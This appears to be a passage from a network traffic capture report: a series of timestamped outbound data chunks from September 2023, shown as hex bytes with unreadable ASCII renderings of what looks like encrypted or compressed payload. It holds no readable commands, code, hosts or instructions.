                                                                                                                                                                    2023-09-15 20:16:20 UTC192OUTData Raw: e0 9c d9 17 de 27 a0 df 04 0b ff 77 5d 21 82 36 f9 39 68 64 22 ba 03 0e 8a 8d 45 54 ba 6a 72 73 e3 25 b8 12 08 2d 9c 6c 85 45 b5 2f 58 e2 41 3b 52 ca 65 b6 b8 93 e9 b5 2e f6 ea e6 13 c6 91 80 60 fd dd 84 bc f2 a8 0b 80 4e e2 65 2a c3 b6 7c 20 35 c7 35 11 58 29 01 10 e7 e7 03 4f d0 0e 76 de 9c 3a e7 20 17 25 6e 8e 2e 82 ee ed e4 b6 a6 d5 f1 58 4f 71 a1 4a 48 8a 6d 6d 0b 4b 84 8f a5 c5 bb 54 45 39 ae 37 84 a0 f7 c6 06 67 3e 30 d7 af 1e 99 46 ad d8 56 61 9a f2 f6 f3 a1 c1 41 79 d1 61 e4 fd 0d cd 87 88 d2 19 40 15 bb 8a 40 85 5d 36 09 ff b5 d3 81 b4 06 8f 97 06 5b be 08 d8 10 bc 3a 30 96 65 7a 81 20 f5 82 83 1e e5 51 89 64 a4 aa 82 cf 26 3a 6b 60 62 b6 99 07 e3 92 e6 fa cb e0 b8 20 31 d3 0a 55 b8 21 61 0f 87 2b 06 a4 ef ad 5c 1c 47 82 9b c4 93 d8 77 76 24 b4
                                                                                                                                                                    Data Ascii: 'w]!69hd"ETjrs%-lE/XA;Re.`Ne*| 55X)Ov: %n.XOqJHmmKTE97g>0FVaAya@@]6[:0ez Qd&:k`b 1U!a+\Gwv$
                                                                                                                                                                    2023-09-15 20:16:20 UTC208OUTData Raw: 0a 1d 75 52 a4 34 ef be ea fd 96 59 0e 35 f7 bc e9 9a 3c b1 fa 30 ad d8 19 e1 4f 57 de 6a 7a a3 f9 36 bc 76 9d dc 79 3d 16 02 4d c6 f4 c7 50 33 58 40 f8 10 ce 9c dc be 3b c3 4d da 59 42 79 6d c9 96 fa 4f 10 4f 92 ed 0f 4a 5c fe 78 61 28 4b b5 cd 46 af 86 d7 09 62 fb 8c f4 e3 26 cb 0e 33 c8 72 39 51 69 86 9c c6 31 ae fd df 6f 7c 6e 60 76 e4 b7 bc 73 b0 89 e8 f1 1b ce 04 5c b4 01 88 c4 99 05 08 e0 f3 3b eb 48 0a 07 65 28 fa ec ed 4c 3a ab d6 0c b4 6b f2 1b 94 a9 1d 48 8a ca 5b 42 09 c3 b4 ea 8d 68 de 5d 9c 49 64 5b 0d fa b4 2d 7d ff 46 df d3 56 9a 36 3b 34 19 6d b7 22 03 3e 28 49 ce 6a c9 d8 88 83 d1 2b 96 bf bc bf 68 7b c8 e4 ef ec cc 2e af fc 4f 81 85 75 d4 a7 42 9e f9 3d a1 38 ae 34 e1 8d ab e3 b9 43 85 db e2 3e 1e d4 52 85 41 fe 30 59 2b c3 a1 0f 81 ed
                                                                                                                                                                    Data Ascii: uR4Y5<0OWjz6vy=MP3X@;MYBymOOJ\xa(KFb&3r9Qi1o|n`vs\;He(L:kH[Bh]Id[-}FV6;4m">(Ij+h{.OuB=84C>RA0Y+
                                                                                                                                                                    2023-09-15 20:16:20 UTC224OUTData Raw: df 8d 05 e4 4f 18 9e 4d 44 12 b9 b2 b3 a2 1d 10 b6 df e0 95 0b 7c e6 4f 07 d6 e9 94 72 c6 3d 0e d2 71 8d 02 f0 0b fd e5 c3 11 e1 ed 71 d9 e9 48 03 5a e7 f7 e6 5c fd 9a ab 4c e2 87 ff 37 c0 51 f5 c1 b1 16 68 9c 76 f2 00 2a 77 43 f5 5a a4 b8 12 89 9b 16 8f db 91 94 bb f6 b9 13 22 76 79 b4 0f b5 15 7a a6 44 f4 f5 a5 64 c7 39 d1 b1 57 28 69 78 80 3f dd 84 1c 4f 2b e8 39 6d 13 12 e1 d9 0d fc 94 61 95 16 20 5f 12 3e f7 f8 f1 5b 45 63 23 84 fd ef 80 13 6f f2 f0 82 cd 5f ba ac 40 12 db 1f 1b d8 e4 b4 ae f5 23 43 f1 f4 55 ff 95 7f 83 cf fd 39 f0 91 b3 de d9 79 d0 01 1e 44 c9 84 f8 b8 5e 29 d6 61 62 3c 19 5b 43 3e 37 6b ea 50 ad a8 25 e9 e0 b6 19 37 5d c4 c5 8b 3d ae 1b 5d c2 ab e6 aa 7a 0a c1 97 56 dc cf c9 1d e4 62 74 e7 2a 3b 8d 68 52 da bd 4d 65 82 34 39 1b 26
                                                                                                                                                                    Data Ascii: OMD|Or=qqHZ\L7Qhv*wCZ"vyzDd9W(ix?O+9ma _>[Ec#o_@#CU9yD^)ab<[C>7kP%7]=]zVbt*;hRMe49&
                                                                                                                                                                    2023-09-15 20:16:20 UTC240OUTData Raw: 78 c8 1f 24 93 b3 87 5a 22 55 29 e3 58 97 d3 8d 86 a9 cf 8b c5 9c ee 0c f5 4b 52 3d ec 3c 87 08 cc 6c c9 ac 6d aa 89 46 35 3d ba d2 f5 b3 82 1a a7 e3 32 f9 a2 c0 f0 33 45 f5 ba e9 d3 83 d1 8a e9 26 c1 00 8f da 1d bb 06 ba 08 f9 51 e3 e3 e8 32 bb e2 38 a2 f2 5e 95 d6 e4 a3 70 02 f6 31 91 2e 7e c8 14 58 fa c5 e5 df 1c c9 5d 6a 6f 91 df ed 24 b7 67 be d2 66 cc 62 9a 2b 2f c9 3c f8 dc d8 f3 42 09 90 24 7b 5e a2 34 b8 92 de e6 65 71 2d 51 24 5c 06 fa 31 d3 61 d2 a8 19 b6 e4 a1 c4 6b 3e bb cf bd 9c 85 39 37 b1 60 1f f1 7c e3 b1 44 3f 71 88 35 d1 52 4d 3f 0a 81 b3 af 06 0c cd 9c 81 ae c6 33 00 5a 1a d0 f8 b0 24 62 c5 a6 67 51 db 52 0f 09 46 76 bc b5 4f 69 77 17 06 4d 61 45 02 9a 6e 63 75 d2 df 0d 21 f1 5c d8 9e 72 37 7f 62 87 c9 a7 83 4b cc ef 8d af 10 01 03 f9
                                                                                                                                                                    Data Ascii: x$Z"U)XKR=<lmF5=23E&Q28^p1.~X]jo$gfb+/<B${^4eq-Q$\1ak>97`|D?q5RM?3Z$bgQRFvOiwMaEncu!\r7bK
                                                                                                                                                                    2023-09-15 20:16:20 UTC256OUTData Raw: 0b 98 24 aa 5f 7b 70 89 ed eb 4f 8c d8 58 0a 38 f1 1e 41 7d 23 e1 62 bc 78 d6 81 e8 54 b2 7c 1c 56 5b 12 a5 6a 43 76 ec 4d 97 f5 c2 bf b2 57 d2 48 0c 51 b6 66 e3 90 46 e7 8d d8 a9 6e a1 48 a9 55 35 94 fe 60 08 0b ef c5 b3 c1 5a 98 28 dc 30 76 2b 31 7b 7c a3 f8 94 38 74 40 22 f9 d0 a0 d8 2e 64 74 25 10 a0 86 4a 05 2c 95 e1 6b ba 0d 1e 5a df d2 df 1b 49 c1 16 0f 75 f5 ef 1c fd 6a 03 9c ff d9 82 22 90 52 a5 35 fb 07 55 2b bc 84 ba fb da ca b4 56 ef 53 05 d1 fe b0 b6 e5 b7 08 e7 fe f5 94 e8 f5 9f 57 49 93 4e 63 61 ad 8a 8a 6d 3e 68 5c b6 d7 6c 2d 19 4c 16 c4 29 58 1e 89 68 8f 5e b4 7e fe 5d 84 5c f2 09 3e 63 28 f6 2a a9 6e 56 59 af 14 ab 63 09 11 43 ae d0 19 60 98 67 11 a1 8b 44 1b 98 a1 48 44 8c 18 ab 46 c8 8f 91 ac 31 1e 7d 88 0c 03 dd 17 ff 52 c9 b1 77 0b
                                                                                                                                                                    Data Ascii: $_{pOX8A}#bxT|V[jCvMWHQfFnHU5`Z(0v+1{|8t@".dt%J,kZIuj"R5U+VSWINcam>h\l-L)Xh^~]\>c(*nVYcC`gDHDF1}Rw
                                                                                                                                                                    2023-09-15 20:16:20 UTC272OUTData Raw: 10 14 ee e1 66 bf 60 9b 38 64 1f 70 48 a2 32 e7 b5 9b 0c d5 13 84 ad 1a ed 80 e9 10 9e 37 20 a9 90 5c fa af b3 9a 92 a4 f6 93 02 8c 13 96 cf 7b ee f2 85 61 a6 44 5f 0d cc 4f d4 f1 0b ba 0e f7 bc c9 26 f3 98 31 83 77 12 a9 00 bf 59 28 56 31 9f 67 dc 95 72 9a e9 c1 e8 44 ac 07 58 4e 7b c1 f8 0d a0 4a 48 7f fd 2a b9 40 55 c9 9b 85 75 c3 8b cc a8 ce ad 1e e1 69 5f 00 f2 c6 69 40 ff 4b 52 d4 f3 57 d7 35 57 8c 7e 5d e9 94 1d 30 f5 6c a6 96 d3 4e a6 db 9b 95 6b 79 5c 32 5a 2e 00 2a 9e bb 76 4c c0 35 6e 47 ed 84 7e b7 52 0d 9a 4f a2 bb a1 25 a5 53 e0 01 c5 51 b0 37 39 d0 c1 12 ef 9b 3e 5e d8 61 ab 51 cf 3d 31 9f 66 89 9f 3c a9 47 09 01 fd 72 58 41 a4 15 84 53 7d 58 ed 58 90 b1 57 e8 c2 e8 d4 de f4 28 11 9c 60 24 1a 75 13 b5 3d 2d bf 6e f4 ba ca f0 70 54 9c be b5
                                                                                                                                                                    Data Ascii: f`8dpH27 \{aD_O&1wY(V1grDXN{JH*@Uui_i@KRW5W~]0lNky\2Z.*vL5nG~RO%SQ79>^aQ=1f<GrXAS}XXW(`$u=-npT
                                                                                                                                                                    2023-09-15 20:16:20 UTC288OUTData Raw: 2a 63 61 58 76 c9 d6 c5 be 20 cf 49 9e ac 24 41 61 9a c1 20 a3 cf 7f c4 f2 a9 3e f9 fd cf 46 88 56 47 78 52 7b 46 b8 93 58 11 71 50 44 96 64 d8 c4 be ef 04 ad 8d 37 ce 66 bb 0a 0a 32 0b d3 f4 0f 62 83 08 4a 99 bd 2a ef 54 a3 0c 3e ab d8 fd 07 14 40 c0 d4 30 8c 56 80 bb 40 80 92 ba b7 1a 61 85 0e d9 3d 9d 1c c4 f7 52 b3 c4 a5 1d 48 d6 6e a8 6f cd 38 e6 f3 d8 a6 dc 8a e6 9f ac f6 48 51 f8 ae 95 45 fb 91 43 11 18 9f db 43 5e 11 93 d9 6b 4a 2c 1f 48 3b f5 34 90 8c 12 0b 1b 2a 27 ed 35 1b 60 7f fe 18 b6 8b 72 27 a8 25 fd f3 31 03 d3 b8 b5 2d 43 89 d3 8e a5 08 b6 ea 60 29 b2 c1 69 70 7d 5e e4 f0 9b 9a 2a 2a ba e1 17 f0 18 23 41 78 be 62 32 32 26 2b f7 e8 2a b2 88 c1 96 45 db 0f 9b 06 f3 c4 30 ef a8 13 9b 52 b8 d9 3b 63 c0 8f 70 c9 b3 1d 64 4c 42 c3 97 64 c8 48
                                                                                                                                                                    Data Ascii: *caXv I$Aa >FVGxR{FXqPDd7f2bJ*T>@0V@a=RHno8HQECC^kJ,H;4*'5`r'%1-C`)ip}^**#Axb22&+*E0R;cpdLBdH
                                                                                                                                                                    2023-09-15 20:16:20 UTC304OUTData Raw: bf cc d2 e9 97 61 5a 69 7c 1f 9d 8a 81 9a f3 7d 4a 30 6e 85 bb f7 b4 34 f4 4f 5e df 06 68 5e 53 93 e8 d6 bc 0b af d3 74 4b d3 b2 7e c4 bc 7e 04 e3 6e 9b 3c 2b be b2 2e b6 8e 28 21 ad 31 5d 93 35 a5 d1 76 ee 18 53 af 39 27 46 6d 05 d0 84 0c 2a 98 f8 88 71 a1 44 51 5e 8f 2d 7b 13 f4 61 8e 14 e8 8f 38 d9 2a d8 70 1f 44 2c 6c a2 bf 1f 06 56 90 23 76 0d 58 45 2f c1 76 8f a2 cc bc 9d e0 e5 c4 f8 ef bd 8f c0 8b 5c a7 1b 70 b7 dc 1d de 6b 7f 0c 0b 77 77 ad 96 bb 43 33 e4 14 34 6b ab a8 82 fb 92 b2 4a e7 b4 63 41 a9 51 53 d7 99 a1 46 84 08 b6 79 05 b5 6c d1 9f b6 01 f9 75 70 e9 8b b4 02 70 82 b4 d6 4c 8a 71 eb 98 06 4e ee ad 24 b8 9a 4f 61 61 0a 53 93 7f 23 b5 3a b2 ad 9e 6d f0 9f 4f 9b 6e b7 b8 f0 6d 7e 59 36 e7 8d 76 fd 11 8a 5f b5 0d c8 24 26 86 e5 c8 5c 63 ec
                                                                                                                                                                    Data Ascii: aZi|}J0n4O^h^StK~~n<+.(!1]5vS9'Fm*qDQ^-{a8*pD,lV#vXE/v\pkwwC34kJcAQSFyluppLqN$OaaS#:mOnm~Y6v_$&\c
                                                                                                                                                                    2023-09-15 20:16:20 UTC320OUTData Raw: 2f cf fe b7 79 90 d3 a5 ae 7e 52 af c3 4c 61 58 7b 6c 38 f7 d2 ea 8f a3 83 a5 da 30 8a f2 33 21 c0 b1 8e 78 ce 7f f4 c3 d2 43 62 e9 53 52 ef d2 5b 24 c0 1e a3 2c ac e8 d1 49 85 67 56 e9 5b 8c 86 81 d1 63 9c 15 83 bc 77 3f bc b2 b5 59 9c 0a d9 9a 90 01 8a e4 9d 44 d6 09 a6 1b ce e7 f6 2b 0c 53 39 ce 47 43 2b 71 da d0 77 29 a0 ec 72 c8 8f da 60 74 06 96 cd 78 46 cf 78 f0 e6 46 77 0b 4d 78 84 94 45 3d 69 02 58 d5 df 17 af 72 0d ac c0 a1 c2 23 ca 5e b6 26 87 f7 83 b2 f6 6a fe bb e1 90 ee 80 25 e3 90 ee 15 f5 ff 85 56 ae 32 c5 2d 8b 11 f5 0e fc b8 3e d6 27 da e4 3a 6e c5 b8 95 4c c5 f4 64 28 45 82 58 49 c8 f0 02 8b 26 69 5b 51 0b f6 1f 81 ce 3a 36 0f 13 c6 9c 93 41 5e f0 1a 30 ab 62 3a dd 47 46 3c f6 99 74 9a 08 ce 35 50 f4 12 d4 c4 61 ed 42 8b 5d 8f 0d 43 34
                                                                                                                                                                    Data Ascii: /y~RLaX{l803!xCbSR[$,IgV[cw?YD+S9GC+qw)r`txFxFwMxE=iXr#^&j%V2->':nLd(EXI&i[Q:6A^0b:GF<t5PaB]C4
                                                                                                                                                                    2023-09-15 20:16:20 UTC336OUTData Raw: cf 34 ef 02 72 a2 d6 a0 e6 37 d6 3e 31 34 12 c6 f1 35 4e 0d 15 29 af 67 54 75 fc 67 08 0e b5 46 0b ac 2b 37 d9 36 f0 c1 81 ab b6 19 95 91 96 09 0c b7 40 b2 2c b2 64 dd eb 54 20 fb 5e 67 9c f7 2b 96 8f eb 63 26 45 6f a6 3e 0a f8 65 77 94 38 f6 55 70 67 67 fd 54 28 eb a8 51 24 a5 c3 c6 8d c1 17 a0 80 32 91 52 4e cf a3 75 c4 a8 fb 59 cb e5 f9 b0 3e 39 00 94 29 4f ac d3 96 ce 2b de 8d 47 fc b5 6b 92 6c 15 a0 9f da 28 22 63 5f cc d1 bb fa 3e c9 81 3c b3 23 a4 4e cf e4 60 e4 67 9a 94 02 c9 97 03 75 66 36 80 42 d6 b1 cb 4f 4e c6 7e 26 d5 54 05 65 57 77 33 fe 4b 43 0d 12 16 c2 22 a8 74 4d 3c 65 0a 55 1a 68 b7 c8 9b df 32 f9 99 60 da 02 e5 5e 20 0d d7 a8 9b 93 43 25 79 72 b4 41 51 93 b7 d1 b5 7b f2 90 82 e5 86 8b e7 38 de c0 c8 57 67 bb 56 0d 75 28 b7 9f c5 dd df
                                                                                                                                                                    Data Ascii: 4r7>145N)gTugF+76@,dT ^g+c&Eo>ew8UpggT(Q$2RNuY>9)O+Gkl("c_><#N`guf6BON~&TeWw3KC"tM<eUh2`^ C%yrAQ{8WgVu(
                                                                                                                                                                    2023-09-15 20:16:20 UTC352OUTData Raw: ef e2 be be 78 8f fe e4 8b d7 38 61 68 a3 ef fe e9 12 fd 0f 66 d4 6b 09 d0 a5 8f e1 f1 8a 10 ff cc e8 51 d4 70 25 6f 56 9f 53 c2 40 1c 51 5c bb 89 b6 40 ad 30 96 fd c7 f4 4d 6e 0e d2 3b 55 3d 66 68 44 f0 a2 49 b7 a0 d3 0d 7c 61 1f c0 f1 c5 a0 10 f5 31 ed 16 d3 04 3f 08 a5 82 67 ee 88 01 9e dd aa 61 1d cf b2 c6 5f f5 eb 5d 30 8a 3f 44 e0 3e 48 a4 c4 46 0c 55 5c c7 c7 56 f8 5b 74 0e ec 91 a6 c1 a3 d2 16 81 ec 0d e8 59 34 fb d8 5d 3b a0 21 09 31 1c 8c cb 70 53 cc df a6 27 48 4d b6 b8 07 08 50 2a 97 2d 02 24 7b 25 4f 54 ea f7 b4 60 8b 39 f4 d9 5c d0 9d 47 4a b7 6f 24 d1 10 1d 0f 8f 98 cc 66 be c9 9d a4 a8 f8 92 cd 35 91 f8 62 f6 cf d9 a9 90 6d f3 17 eb 85 b2 04 e0 2f 55 f4 4e 7b 55 a6 57 44 96 02 e2 69 5d 6d b6 30 e5 55 97 50 0d 62 8b 92 51 8b e8 e7 8f a3 e4
                                                                                                                                                                    Data Ascii: x8ahfkQp%oVS@Q\@0Mn;U=fhDI|a1?ga_]0?D>HFU\V[tY4];!1pS'HMP*-${%OT`9\GJo$f5bm/UN{UWDi]m0UPbQ
                                                                                                                                                                    2023-09-15 20:16:20 UTC368OUTData Raw: 9f 2f e7 3c c7 42 3d 07 b7 fc 2a 96 df 6e e2 84 fd f9 56 c1 29 1b 81 c8 9a 22 74 e1 cb 0e 80 b9 d0 92 2f ef 4a 9a 54 0e 20 bc 81 7d 99 87 ef 94 ee 1e c7 67 0d e0 10 ee 3b 46 c0 f3 40 46 7c 4f a1 46 da 47 68 3b b8 29 1e 2b de cd fe 9a 9d db 1e 1e be 0e 4e df 5f 0f cc 99 01 c3 6a 95 e8 8f f4 e0 17 7c dd 5a ca c2 76 82 30 ff 2a 5c 32 11 a3 02 1f 3f 70 60 f8 ba 66 c1 1f 83 84 2d 6c 8f e8 6d e3 95 33 4a 6f 9d d4 18 1d 53 d6 09 7a f6 e3 d2 d5 2b 71 76 83 0a 7e ce e9 a9 70 83 4e 93 31 6d 00 7f e3 9d 53 d3 2f d5 10 40 60 8a 2e 00 76 7c 79 4d da a0 31 5d 5f 26 87 71 14 ed 32 ca 7f db c8 d1 19 a0 40 63 2c b9 e7 fb 84 5e 8d d5 1f 26 2e 83 19 b8 07 50 d2 cf c4 6a 91 8a 5f 38 8e d8 7e ad ca e9 aa c7 71 4b 0c 72 d7 32 53 4b 62 c9 d8 60 71 d7 ed e4 60 f8 18 fa f3 d7 57
                                                                                                                                                                    Data Ascii: /<B=*nV)"t/JT }g;F@F|OFGh;)+N_j|Zv0*\2?p`f-lm3JoSz+qv~pN1mS/@`.v|yM1]_&q2@c,^&.Pj_8~qKr2SKb`q`W
                                                                                                                                                                    2023-09-15 20:16:20 UTC384OUTData Raw: f3 83 dd 58 e8 05 fc 53 7c d6 54 7d 64 0d 34 12 21 f5 0b 6d 3d da a4 9b 08 e0 d0 ed 3b 6e 05 11 71 75 5b 14 07 cb 55 0d b0 74 fb 6f 4c 2a c2 16 8a 6a b9 bc aa bc 4d 69 cd 59 fe 25 3c 56 16 dc d5 13 ed 18 43 a5 42 68 c1 a1 32 10 54 80 95 1c 02 2e 11 22 22 d9 67 26 c8 ed b9 63 d6 e4 15 cf 06 94 c9 76 42 a8 2a 42 5e 41 a2 40 d3 f5 16 5e d2 f7 4e 27 df 42 93 8d dd bf 56 24 21 a9 9e 89 f0 3d 00 3a f5 f0 83 6e c3 47 61 1e 6c 75 86 54 01 09 3f 31 1b 70 6e 1a ee 25 e8 6c 05 74 2d 8a 37 fe e1 f2 5e f1 da eb 84 68 1f 75 87 cf c3 75 73 ae 14 0f db 4a bf ab 7b d4 b7 ca 10 f2 ec 15 24 be 48 e3 18 92 36 4a 36 0f f9 fe 5a d7 ea 78 9f e4 e2 78 1f 8d 9c 8d df 23 eb ed 71 cb 28 3b 6a 81 ea 2a 39 67 ef 97 de 6a 38 69 9d a4 02 c1 e3 73 64 9e c8 2b f5 67 dc b7 dc ba 35 49 0b
                                                                                                                                                                    Data Ascii: XS|T}d4!m=;nqu[UtoL*jMiY%<VCBh2T.""g&cvB*B^A@^N'BV$!=:nGaluT?1pn%lt-7^huusJ{$H6J6Zxx#q(;j*9gj8isd+g5I
                                                                                                                                                                    2023-09-15 20:16:20 UTC400OUTData Raw: d6 06 ee f7 f4 52 d8 f8 09 75 e0 8d 36 19 cf 56 30 6e 36 ff 4e 19 64 bd 03 97 26 bd 5f 33 d0 76 78 7f 46 7d bf a5 6f ec cf 1d 14 1e 10 38 f4 38 c7 93 0a fc aa e1 43 b4 56 82 fa d8 db b9 03 f9 24 bd 60 34 53 fb 21 0c f9 7c e4 74 88 4c 84 f9 65 a3 e7 a0 ac 45 fe 32 fc 8d 41 73 44 84 3f 86 e3 81 ce ab 93 da 8a f1 11 fc 4b 6e ba cd 91 14 02 02 02 43 1e e3 d7 a9 c2 df 65 c8 47 bf d1 93 66 f8 28 77 07 7e 43 ff 76 07 88 45 1a b9 60 dd 52 a3 5f 34 42 14 9f 48 c5 3d 9c 4e a2 3a dd 3f fd 2e 4f b0 44 f7 9b ef 35 03 9b 27 55 50 68 34 17 b5 10 dc 3e c9 e6 bd 7e e8 35 db ce e5 c1 99 48 24 81 86 5b 3c a2 87 85 5e e8 a5 8a 2d 47 5a 7c 05 b1 c0 95 0f 9d 68 49 bd c3 30 b0 c7 59 4e 33 f6 7b 2a 6f 4d 21 53 31 88 a7 dd a5 ad 94 69 d2 62 7a fc 75 00 0a 30 84 4c b2 2b af 61 8d
                                                                                                                                                                    Data Ascii: Ru6V0n6Nd&_3vxF}o88CV$`4S!|tLeE2AsD?KnCeGf(w~CvE`R_4BH=N:?.OD5'UPh4>~5H$[<^-GZ|hI0YN3{*oM!S1ibzu0L+a
                                                                                                                                                                    2023-09-15 20:16:20 UTC416OUTData Raw: 0e 6e 87 85 7c ed f1 87 16 73 2a 3b 7f e4 94 7f fe 1b 31 ac fe 86 60 69 b0 a5 f7 91 e1 4c 4e 1a 33 c4 3b 4d df 3a 05 cd 46 1f 62 13 7c c5 c3 61 d8 41 50 7c 56 f6 6e b6 0c 1b 53 ce c8 56 f3 e2 da 41 76 e3 e3 47 41 35 ec f1 43 40 22 ff 4b 2d a0 70 d5 56 aa 9d 7f af ee 04 f7 59 04 19 e2 fb 1f 93 5d 32 f8 79 bd 75 2b 0d e2 e3 7a 16 55 5b 4d 88 b2 bf cf 62 69 3b 7b 44 23 5e d7 85 3e 6b bc 4b 58 2d 10 55 db 22 5c 94 13 4a ab 09 d5 34 7c 8e ea b4 4e 5b c7 11 80 ed 6e 83 ba 80 bf 74 52 83 2f dc f8 e9 bb b9 cd b2 9a 5d fc 4e 99 5e c8 3c 08 27 52 07 fc 52 a4 49 b7 3d 2b b2 a0 2c 43 fe ee 73 d0 7f b2 d8 08 49 5b 8c 9b 18 64 62 7a dc a1 f7 77 1f b2 86 2c f8 49 c0 e1 fe 9f 6d 45 34 d3 86 5b a0 ec 91 47 2f e3 55 4a 28 21 09 0d a9 47 0c d0 c3 0c 7d e6 d3 9e c3 f4 e3 02
                                                                                                                                                                    Data Ascii: n|s*;1`iLN3;M:Fb|aAP|VnSVAvGA5C@"K-pVY]2yu+zU[Mbi;{D#^>kKX-U"\J4|N[ntR/]N^<'RRI=+,CsI[dbzw,ImE4[G/UJ(!G}
                                                                                                                                                                    2023-09-15 20:16:20 UTC432OUTData Raw: 70 5c 2d b1 11 d6 28 90 9a d9 f3 4c f7 2c 42 03 d2 e7 6e 89 36 ce 07 b4 93 18 5c 0f 27 3d 6f 5e 4e d4 2b 32 c9 ad fa 21 6e bc 60 87 d8 bf 12 20 74 3e 74 9e b0 cd cc b7 d7 84 dd 5b 9b 91 5b fa 7d 19 8c 2f 08 b7 20 76 62 10 e0 c7 9f 7d 0e 64 c3 a7 4e 3c 81 8d ab 27 36 fe 1a a0 1f 31 cf 29 0b 55 e7 26 13 84 a6 d5 09 07 22 df 00 16 bf 56 68 e3 68 ec 93 09 67 83 04 0c 2e 6a bb 5c a3 cf f9 13 a1 2c 11 be 7b b6 ce 5a 75 08 2b 3b 54 47 d0 56 ab 5e 0c f1 3d 1c b8 73 13 09 c9 fb 63 1f be 84 17 9a d4 55 68 2d a7 30 1e 2a cd 08 1c 36 d9 3b da cb be 5c a5 f7 45 76 fc be 71 2f a4 13 fa 2c d7 64 73 6b 8d d6 a5 aa 87 80 70 26 34 7a 61 9e 33 ed 95 7b 1d 4e f1 e0 3f b4 22 8a e2 1e 65 47 98 f2 ba 79 b6 cb 49 9d 57 61 82 42 2a ed 50 50 99 04 c7 ca fe 55 90 26 8d 5f d1 1b 76
                                                                                                                                                                    Data Ascii: p\-(L,Bn6\'=o^N+2!n` t>t[[}/ vb}dN<'61)U&"Vhhg.j\,{Zu+;TGV^=scUh-0*6;\Evq/,dskp&4za3{N?"eGyIWaB*PPU&_v
                                                                                                                                                                    2023-09-15 20:16:20 UTC448OUTData Raw: cb bb 5e 4b af 7a fa 9a 5d b9 59 82 07 bc 3c 2f a2 b0 8a df 74 27 26 07 c2 22 eb ac b5 57 80 96 c3 df d6 68 98 ca e4 8c ee d9 44 07 8e 27 86 24 ab 21 d3 7f 05 5d 7a c4 a6 b7 ab 6f 06 16 51 4b a3 b9 fd 9b 26 0a 5d c7 65 64 ce 01 7c c7 dc d0 3d 57 0b e4 15 e7 4c 07 30 a2 6a a2 75 9d a0 1c 38 ef f8 5d cb 25 63 30 5b f5 3f 65 09 20 06 44 68 ec 61 72 c4 ec bf 09 b9 6f 4c 41 c4 df 5a 26 fe da ac a2 7d a8 2f 98 5f 18 b4 1a d6 0c 2f 41 9b c1 72 6c a0 b1 01 d9 99 90 9a 92 d9 73 b7 20 02 2f 29 48 45 7e 5d 4e 4d c6 6c 08 0e 00 86 d2 fd 32 21 b9 91 cd a0 75 f2 d5 d3 ed 70 9c 55 77 5c 41 e7 6e 84 e5 01 e8 2b f0 47 d6 09 1d ac f6 cb d3 7a 80 6f a1 46 0e cc 39 ec 80 fe 76 78 00 71 09 71 9f 31 ca d6 c2 1c 82 0f 8d 61 28 21 e5 5f 53 74 24 02 24 91 8d d0 49 7b fe c8 ee a3
                                                                                                                                                                    Data Ascii: ^Kz]Y</t'&"WhD'$!]zoQK&]ed|=WL0ju8]%c0[?e DharoLAZ&}/_/Arls /)HE~]NMl2!upUw\An+GzoF9vxqq1a(!_St$$I{
                                                                                                                                                                    2023-09-15 20:16:20 UTC464OUTData Raw: cc 68 7f 64 d1 c3 5d 64 48 16 dd de 83 b4 3b 21 8a 21 14 68 93 2b ed 7c 43 09 14 04 1d 00 e9 28 11 6a e0 fb 9b 76 41 2f b5 f9 ac cd e4 3a bc 70 2b e7 bd b7 da 2a 05 2b 97 e7 0c 01 2f ca cd 98 ad fc ea f3 a1 d6 d6 fa 1a 74 cc e4 62 e8 db 79 36 7e 9b ad c6 fa ad 54 5e 85 bb e4 4c 00 60 d1 8a 46 1d 98 1a 0a 59 c6 db cb 86 ed ca bd 1b 77 cf 74 8d 8a 2e 54 7e e9 f6 a0 f8 91 b4 fe 24 ab af 42 12 a5 a7 03 ea eb 6e 70 64 67 d2 8b 6e 1f da 74 2f 25 e1 25 cb 09 5b 2e 24 6a b8 bb de 91 fd 39 92 1f 15 79 eb fb 8a 9c 4c 92 4e fe b8 30 fa 2c 02 34 2c a8 91 73 17 b8 6d 02 e6 24 cb 3f 04 e3 b8 53 99 fd 59 08 92 b9 4c 59 e1 2c 08 91 bf 41 35 c2 ab c5 33 b4 20 2a f2 3b 95 07 f7 59 11 95 94 c4 1b 67 9d c9 d1 d2 19 34 07 9b 55 2b 9f 4c c4 6f 71 7e fb 47 ff e0 10 eb 17 41 56
                                                                                                                                                                    Data Ascii: hd]dH;!!h+|C(jvA/:p+*+/tby6~T^L`FYwt.T~$Bnpdgnt/%%[.$j9yLN0,4,sm$?SYLY,A53 *;Yg4U+Loq~GAV
                                                                                                                                                                    2023-09-15 20:16:20 UTC480OUTData Raw: 97 a6 03 a8 fe 76 3e 2a e0 21 b5 a4 b5 f3 06 56 4a ab 34 05 4f 7e ed a5 1d b8 4d 65 d1 81 9a f9 2e 52 52 b3 3b 90 a8 a1 34 7c 5c cf 85 88 de 89 a6 5b 60 a0 4b 89 23 2e 9d 88 85 b5 d4 37 54 76 85 04 12 b6 e5 a1 93 ef b8 28 0d 6f ab d1 3c db 5e 64 38 ab 2b f8 2c dd ad ec 34 7f 0e ec 43 ca ef 55 b4 cf ee 73 6f ec 89 28 d5 fb 9e 62 ad 22 3c 69 d9 1a 63 d1 f6 1b bc 26 2e 1f 26 06 08 0d 47 24 4b fe bb 18 1d 26 0e 28 8c 3f 76 92 18 c9 0f f3 24 2a 78 e5 82 46 aa ad a0 74 59 68 c0 6b e2 aa 4d 39 97 3a 39 37 00 34 4a 2c 6f be c8 b2 02 32 ad c4 af e3 0c d8 8e 19 e0 d2 ad 0b 9d 55 cb ef 81 40 03 83 d8 dd 90 bd 86 e0 3c 24 33 9f 0f 2f 5d 94 e7 14 ba fb a6 d8 0a c1 b6 35 77 cc 9a 9f 26 35 c3 9b 3d 39 dc 0f ac bb 14 5a 17 d5 44 49 5b 7b 52 ad 0f 62 82 02 96 20 29 5e 3c
                                                                                                                                                                    Data Ascii: v>*!VJ4O~Me.RR;4|\[`K#.7Tv(o<^d8+,4CUso(b"<ic&.&G$K&(?v$*xFtYhkM9:974J,o2U@<$3/]5w&5=9ZDI[{Rb )^<
